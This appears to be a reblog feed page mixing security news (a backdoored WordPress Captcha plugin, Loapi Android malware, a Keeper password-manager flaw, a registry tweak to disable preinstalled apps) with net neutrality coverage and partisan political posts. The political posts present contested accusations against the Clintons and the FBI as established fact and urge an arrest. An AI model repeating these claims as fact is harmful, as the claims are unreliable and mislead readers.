Hacker News: Hidden Backdoor Found In WordPress Captcha Plugin Affects Over 300,000 Sites

popular-wordpress-plugin

Buying popular plugins with a large user-base and using it for effortless malicious campaigns have become a new trend for bad actors.

One such incident happened recently when the renowned developer BestWebSoft sold a popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.

In a blog post published on Tuesday, WordFence security firm revealed why WordPress recently kicked a popular Captcha plugin with more than 300,000 active installations out of its official plugin store.

While reviewing the source code of the Captcha plugin, WordFence folks found a severe backdoor that could allow the plugin author or attackers to remotely gain administrative access to WordPress websites without requiring any authentication.

The plugin was configured to automatically pull an updated “backdoored” version from a remote URL — https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php — after installation from the official WordPress repository without site admin consent.

wordpress-plugin

This backdoor code was designed to create a login session for the attacker, who is the plugin author in this case, with administrative privileges, allowing them to gain access to any of the 300,000 websites (using this plugin) remotely without requiring any authentication.

“This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself’” reads the WordFence blog post. “The backdoor installation code is unauthenticated, meaning anyone can trigger it.”

Also, the modified code pulled from the remote server is almost identical to the code in legitimate plugin repository, therefore “triggering the same automatic update process removes all file system traces of the backdoor,” making it look as if it was never there and helping the attacker avoid detection.

wordpress-plugin-hack

The reason behind the adding a backdoor is unclear at this moment, but if someone pays a handsome amount to buy a popular plugin with a large user base, there must be a strong motive behind.

In similar cases, we have seen how organized cyber gangs acquire popular plugins and applications to stealthy infect their large user base with malware, adware, and spyware.

While figuring out the actual identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named “Stacy Wellington” using the email address “scwellington[at]hotmail.co.uk.”

Using reverse whois lookup, the researchers found a large number of other domains registered to the same user, including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

What’s interesting? All of the above-mentioned domains booked under the user contained the same backdoor code that the WordFence researchers found in Captcha.

WordFence has teamed up with WordPress to patch the affected version of Captcha plug-in and blocked the author from publishing updates, so websites administrators are highly recommended to replace their plugin with the latest official Captcha version 4.4.5.

WordFence has promised to release in-depth technical details on how the backdoor installation and execution works, along with a proof-of-concept exploit after 30 days so that admins get enough time to patch their websites.

Swati - Hacking News
Technical Writer, Security Blogger and IT Analyst. She is a Technology Enthusiast with a keen eye on the Cyberspace and other tech related developments.

Former Asst. FBI Director: Clinton Crimes 20 Times Bigger than Watergate

Former Assistant FBI Director James Kallstrom unloaded on James Comey, Robert Mueller, Hillary Clinton, and Barack Obama Thursday, charging that major crimes “20 times bigger than Watergate” are being swept under the rug while Attorney General Jeff Sessions “is in a coma.”

Appearing on Fox News’ Varney & Co., Kallstrom told the host that it “was obvious to anybody that knows anything” that former President Barack Obama was not going to let James Comey indict Clinton.

“It turns out — unfortunately — he was a political hack,” Kallstrom said flatly. “I think he maybe started out in an honorable way. His opinion of himself is sky high —  just an unbelievable guy with just an arrogance about him…. It got him in trouble because I think he thought he was Superman and he found out that he wasn’t.”

Kallstrom blamed the Clintons for Comey’s descent into hackery.

“The dogs are always going to bite your heels when you’re dealing with the Clintons,” he explained. “Look how long the public, the American people have been dealing with the crime syndicate known as the Clinton Foundation… just look at what’s in the public domain. The Clintons have been taking advantage of their stations in life for so long.”

“Back in ’95, ’96 — somewhere around there — Bill Clinton let our guidance technology for our ICBM missiles go to China. Things like this that are very devastating,” he pointed out.

And then a few years down the road, “we sell 20 percent of our uranium,” Kalstrom added, referencing the corrupt Uranium One deal that routed millions of Russian dollars to the Clinton Foundation during the time Secretary of State Hillary Clinton served on the federal government’s Committee on Foreign Investment.

Kallstrom also questioned why Deputy Attorney General Rod Rosenstein was appointed to his position.

“What does he do as soon as he gets in there? He appoints a special counsel. Who is it? It’s Bob Mueller. Roll the tape backwards. Bob Mueller is the FBI director, Rosenstein is the U.S. attorney in Baltimore prosecuting people involved in this case.”

Kallstrom charged that Rosenstein was basically put in place at the DOJ by the Democrats, complaining that Sessions was forced to recuse himself while “this huge forest fire is burning up his real estate.”

“You don’t have to put your brother in there like Kennedy did,” he noted. “But put somebody in there that agrees with the policies you’re trying to put together. Then Rosenstein throws this hand grenade at you by naming this counsel — which is B.S. — and putting Mueller, who has a conflict of interest 20 miles wide, in on the job.”

He added, “I don’t know if it’s a conspiracy, but it sure smells like one.”

Kallstrom pointed out that just “the unmaskings of names alone is a major scandal.” Requests to identify Americans whose names surfaced in foreign intelligence reporting — known as unmasking — was done at a freakishly rapid rate in the final months of the Obama administration.

“We got all these major crime things bubbling – all of which were 20 times bigger than Watergate! And nothing seems to be happening… the attorney general is in a coma!” he said.

“Clinton cabal is GOING DOWN!” says Frm. FBI Asst. Director

Former FBI assistant director James Kallstrom has come forward and revealed that the Clinton Foundation’s crimes will soon be exposed by “patriots” fighting back against the FBI’s anti-Trump “cabal.”

Kallstrom, a 27-year veteran of the FBI, said that investigators are sick of the nonsense.

“99 percent of the people in the FBI are doing a fantastic job,” Kallstrom said during an interview with New York radio host John Catsimatidis last Sunday. “It’s a small cabal of people running the FBI, the James Comey sycophants” that are sabotaging the organization’s Clinton investigations.

But that’s going to end soon, Kallstrom revealed.

Talking to Fox Business Network’s Stuart Varney on Monday, Kallstrom claims there’s an organized movement of “patriots” within the FBI that are going to strike back — and their plan is already in motion.

Discussing the political bias at the top of the FBI, Varney summarized Kallstrom’s warnings about special counsel Robert Mueller’s investigation.

“I have said in my opinion there is a cabal active within the FBI and the Justice Department … which hates Trump, which protected Hillary Clinton and tried to bring down Donald Trump,” Varney said to Kallstrom. “That is an extraordinary story of interference in an American presidential election.”

“Without question that’s what it was. Just like the whole ‘so-called’ Clinton investigation, it was phony from the beginning,” Kallstrom said. “No grand jury, giving witnesses immunity, putting all the subjects in one room at the same time. I mean it’s crazy. It’s nuts what they did!”

Kallstrom said morale among the honest FBI agents is dangerously low, and that patriots within the organization are fed up.

“Well I think there’s a lot of patriots that have had it up to here with what’s going on, and they’re going to step forward and tell people what the shenanigans have been,” Kallstrom said, specifically mentioning how this FBI cabal “shut down the Clinton Foundation investigation” and turned the FBI investigations into politically-motivated witch hunts.

Would you support a change in FBI leadership… and Hillary Clinton’s immediate arrest?

Watch Kallstrom’s stunning reveal below, then share your opinon  —

 

The Horn News

Hacker News: This New Android Malware Can Physically Damage Your Phone

phone-swollen-battery

Due to the recent surge in cryptocurrency prices, not only hackers but also legitimate website administrators are increasingly using JavaScript-based cryptocurrency miners to monetize by levying the CPU power of your PC to mine Bitcoin or other cryptocurrencies.

Just last week, researchers from AdGuard discovered that some popular video streaming and ripper sites including openload, Streamango, Rapidvideo, and OnlineVideoConverter hijacks CPU cycles from their over hundreds of millions of visitors for mining Monero cryptocurrency.

Now, researchers from Moscow-based cyber security firm Kaspersky Lab have uncovered a new strain of Android malware lurking in fake anti-virus and porn applications, which is capable of performing a plethora of nefarious activities—from mining cryptocurrencies to launching Distributed Denial of Service (DDoS) attacks.

Dubbed Loapi, the new Android Trojan can perform so many more malicious activities at a time that can exploit a handset to the extent that within just two days of infection it can cause the phone’s battery to bulge out of its cover.

Described as a “jack-of-all-trades” by the researchers, Loapi has a modular architecture that lets it conduct a variety of malicious activities, including mining the Monero cryptocurrency, launching DDoS attacks, bombarding infected users with constant ads, redirecting web traffic, sending text messages, and downloading and installing other apps.

Loapi Destroyed An Android Phone In Just 2 Days

android-malware
When analyzed a Loapi sample, Kaspersky’s researchers discovered that the malware mines the Monero cryptocurrency so intensely that it destroyed an Android phone after two days of testing, causing the battery to bulge and deforming the phone cover.

According to researchers, the cybercriminals behind Loapi are the same responsible for the 2015 Android malware Podec. They are distributing the malware through third-party app stores and online advertisements that pose as apps for “popular antivirus solutions and even a famous porn site.”

A screenshot in the Kaspersky blog suggests that Loapi impersonates as at least 20 variations of adult-content apps and legitimate antivirus software from AVG, Psafe DFNDR, Kaspersky Lab, Norton, Avira, Dr. Web and CM Security, among others.

Upon installation, Loapi forces the user to grant it ‘device administrator’ permissions by looping a pop-up until a victim clicks yes, which gives the malicious app the same power over your smartphone that you have.

This highest level privilege on a device would also make the Loapi malware ideal for user espionage, though this capability is not yet present in the malware, the Kaspersky researchers think this can be included in the future.

Loapi Malware Aggressively Fights to Protect Itself

Researchers also said the malware “aggressively fights any attempts to revoke device manager permissions” by locking the screen and closing phone windows by itself.

Loapi communicates with the module-specific command and control (C&C) servers, including advertisement module, SMS module and mining module, web crawler, and proxy module, for different functions to be performed on the infected device.

By connecting with one of the above-mentioned C&C servers, Loapi sends a list of legitimate antivirus apps that pose it danger and claims the real app as malware and urges the user to delete it by showing the pop-up in a loop until the user finally deletes the app.

“Loapi is an interesting representative from the world of malicious Android apps. It’s creators have implemented almost the entire spectrum of techniques for attacking devices: the Trojan can subscribe users to paid services, send SMS messages to any number, generate traffic and make money from showing advertisements, use the computing power of a device to mine cryptocurrencies, as well as perform a variety of actions on the internet on behalf of the user/device,” the researchers concluded.

Fortunately, Loapi failed to make its ways to Google Play Store, so users who stick to downloads from the official app store are not affected by the malware. But you are advised to remain vigilant even when downloading apps from Play Store as malware often makes its ways to infect Android users.

Mohit Kumar - Hacking News
      
Entrepreneur, Hacker, Speaker, Founder and CEO — The Hacker News and The Hackers Conference.

REPORT: Dirty Geopolitics of Olympics and Globalism – Will Russia Say NO and Start Alternative Games?

The spirit of Olympic Games is dead, without Russia participating, what’s the point? Empty hollow victories, worthless medals, meaningless competition marred by political sabotage. So called winners will have an “*” forever next to there name, the mark of shame.
I for one will boycott these games, move along… there’s nothing to watch here. IOC and Wada – do your job, stay out of politics and uphold the true spirit of Olympics! SMH 😦

Futurist Trendcast

As we are approaching Christmas and New Year’s, this is the last major hard-hitting, heavy-duty geopolitical article of 2017, unless something extraordinary happens in the next two weeks! As a matter of fact, I hope this is the last report about geopolitics of sport and Olympics I’ll ever write. Let’s hope, although no guarantees as the pressure on Russia will continue and intensify before Russian elections. All pretexts to exert pressure and undermine elections will be used, and all weak links will be utilized, sport being one of the most prominent such weak links. However, when weak links are exposed to light, this also gives an opportunity to fix problems. Therefore, I hope Russians are paying attention, drawing conclusions and working on solutions. What solutions? Let’s talk about it below!

I’ve packed this piece with extra energy and embedded in it some extra interesting intel! Don’t miss!

THE VICIOUS PATTERN OF…

View original post 5,158 more words

Hacker News: FCC Just Killed Net Neutrality—What Does This Mean? What Next?

Net neutrality is DEAD—3 out of 5 federal regulators voted Thursday to hand control of the future of the Internet to cable and telecommunication companies, giving them powers to speed up service for websites they favor or slow down others.

As proposed this summer, the US Federal Communications Commission (FCC) has rolled back Net Neutrality rules that require Internet Service Providers (ISPs) to treat all services and websites on the Internet equally and prohibit them from blocking sites or charging for higher-quality service.

This action repeals the FCC’s 2015 Open Internet Order decision taken during the Obama administration.

What is Net Neutrality and Why Is It Important?

Net Neutrality is simply Internet Freedom—Free, Fast and Open Internet for all.

In other words, Net Neutrality is the principle that governs ISPs to give consumers access to all and every content on an equal basis, treating all Internet traffic equally.

Today, if there’s something that makes everyone across the world ‘Equal,’ it is the Internet.

Equality over the Internet means, all ISPs have to treat major websites like Facebook and Google in the same way as someone’s local shop website, and the wealthiest man in the world has the same rights to access the Internet as the poorer.

This is what “Net Neutrality” aims at.

Here’s Why the FCC Repeals Net Neutrality Rules

FCC-Net-Neutrality

The FCC Chairman for the Trump administration, Ajit Pai, who has openly expressed his views against net neutrality, was previously quoted as saying that Net Neutrality was “a mistake.”

Pai has previously argued that the 2015 regulations had discouraged internet providers from investing in their networks, as well as slowed the expansion of internet access.

On Thursday, the FCC’s two Democrats voted to object the decision to repeal Net Neutrality, and the three Republican members, including Chairman Pai, Commissioner Brendan Carr, and Commissioner Mike O’Rielly, voted to overturn protections put in place in 2015.

Here’s what all the three Republicans said in their remarks about their decision to repeal Net Neutrality:

“Prior to the FCC’s 2015 decision, consumers and innovators alike benefitted from a free and open internet. This is not because the government imposed utility-style regulation. It didn’t. This is not because the FCC had a rule regulating internet conduct. It had none. Instead through Republican and Democratic administrations alike, including the first six years of the Obama administration, the FCC abided by a 20-year bipartisan consensus that the government should not control or heavily regulate internet access,” said Commissioner Carr.

“I sincerely doubt that legitimate businesses are willing to subject themselves to a PR nightmare for attempting to engage in blocking, throttling, or improper discrimination. It is simply not worth the reputational cost and potential loss of business,” said Commissioner O’Rielly.

“How does a company decide to restrict someone’s accounts or block their tweets because it thinks their views are inflammatory or wrong? How does a company decide to demonetize videos from political advocates without any notice?…You don’t have any insight into any of these decisions, and neither do I, but these are very real actual threats to an open internet,” said Chairman Pai.

Here’s How the Internet & Tech Firms Reacted

Net-Neutrality

The response from the tech industry was swift and loud and predictable. The industry isn’t happy with what is turning out to be the Trump administration’s biggest regulatory move yet.

“We are incredibly disappointed that the FCC voted this morning – along partisan lines – to remove protections for the open internet. This is the result of broken processes, broken politics, and broken policies. As we have said over and over, we’ll keep fighting for the open internet, and hope that politicians decide to protect their constituents rather than increase the power of ISPs,” Mozilla said in a statement.

“Today’s decision from the Federal Communications Commission to end net neutrality is disappointing and harmful. An open internet is critical for new ideas and economic opportunity – and internet providers shouldn’t be able to decide what people can see online or charge more for certain websites,” Sheryl Sandberg said, Chief Operating Officer of Facebook.

“We’re disappointed in the decision to gut #NetNeutrality protections that ushered in an unprecedented era of innovation, creativity & civic engagement. This is the beginning of a longer legal battle. Netflix stands w/ innovators, large & small, to oppose this misguided FCC order,” Netflix tweeted.

Obviously, Internet providers are more likely to strike valuable deals with large, established services and websites than relatively unknown companies or startups, which will be hit hardest by the repeal.

With no surprise, ISPs including Comcast, Verizon, and AT&T have welcomed the new rules, saying they will not block or throttle any legal content but may engage in paid prioritization.

Since the commission will take a few weeks to make final adjustments to the new rules, you will not see any potential change right away.

What Next? Can Net Neutrality Be Saved?

Net-Neutrality

Obviously, you cannot do anything overnight to repeal the decision.

Reportedly, attorney generals from across the country and consumer advocacy groups are considering suing the FCC in an attempt to reverse Thursday’s repeal of net neutrality rules.

To overturn the FCC’s order, critics and internet activists are also going to push for Congress to step in and pass a resolution of disapproval using the Congressional Review Act.

“This fight isn’t over. With our allies and our users, we will turn to Congress and the courts to fix the broken policies,” Mozilla said.

“We’re ready to work with members of Congress and others to help make the internet free and open for everyone,” Sheryl Sandberg said.

“We will continue our fight to defend the open Internet and reverse this misguided decision,” Twitter said.

The FCC’s repeal of net neutrality will take effect 60 days after publication in the Federal Register, which doesn’t happen immediately and could take six weeks or even more after the FCC vote.

Once it become law, the repeal will return everything to the state it was before 2015.

Mohit Kumar - Hacking News
      
Entrepreneur, Hacker, Speaker, Founder and CEO — The Hacker News and The Hackers Conference.

Hacker News: Pre-Installed Password Manager On Windows 10 Lets Hackers Steal All Your Passwords

keeper-windows-10-password-manager-hacking

If you are running Windows 10 on your PC, then there are chances that your computer contains a pre-installed 3rd-party password manager app that lets attackers steal all your credentials remotely.

Starting from Windows 10 Anniversary Update (Version 1607), Microsoft added a new feature called Content Delivery Manager that silently installs new “suggested apps” without asking for users’ permission.

According to a blog post published Friday on Chromium Blog, Google Project Zero researcher Tavis Ormandy said he found a pre-installed famous password manager, called “Keeper,” on his freshly installed Windows 10 system which he downloaded directly from the Microsoft Developer Network.

Ormandy was not the only one who noticed the Keeper Password Manager. Some Reddit users complainedabout the hidden password manager about six months ago, one of which reported Keeper being installed on a virtual machine created with Windows 10 Pro.

Critical Flaw In Keeper Password Manager

Knowing that a third-party password manager now comes installed by default on Windows 10, Ormandy started testing the software and took no longer to discover a critical vulnerability that leads to “complete compromise of Keeper security, allowing any website to steal any password.”

“I don’t want to hear about how even a password manager with a trivial remote root that shares all your passwords with every website is better than nothing. People really tell me this,” Ormandy tweeted.

The security vulnerability in the Keeper Password Manager was almost identical to the one Ormandy discovered and reported in the non-bundled version of the same Keeper plugin in August 2016 that enabled malicious websites to steal passwords.

“I checked and, they’re doing the same thing again with this version. I think I’m being generous considering this a new issue that qualifies for a ninety day disclosure, as I literally just changed the selectors and the same attack works,” Ormandy said.

To explain the severity of the bug, Ormandy also provided a working proof-of-concept (PoC) exploit that steals a user’s Twitter password if it is stored in the Keeper app.

Install Updated Keeper Password Manager

Ormandy reported the vulnerability to the Keeper developers, who acknowledged the issue and released a fix in the just released version 11.4 on Friday by removing the vulnerable “add to existing” functionality.

Since the vulnerability only affects version 11 of the Keeper app, which was released on December 6 as a major browser extension update, the vulnerability is different from the one Ormandy reported six months ago.Keeper has also added that the company has not noticed any attack using this security vulnerability in the wild.

As for Windows 10 users, Ormandy said users wouldn’t be vulnerable to the password theft unless they open Keeper password manager and enable the software to store their passwords.

However, Microsoft still needs to explain how the Keeper password manager gets installed on the users’ computers without their knowledge.

Meanwhile, users can use this registry tweak to disable Content Delivery Manager in order to prevent Microsoft from installing unwanted apps silently on their PCs.

Swati - Hacking News
Technical Writer, Security Blogger and IT Analyst. She is a Technology Enthusiast with a keen eye on the Cyberspace and other tech related developments.

e297a05 on Dec 14, 2015

1 contributor
7 lines (5 sloc)  452 Bytes
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\DefaultUser\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager]
;0 = No Disable
;1 = Yes Enable (Default)
“PreInstalledAppsEnabled”=dword:00000000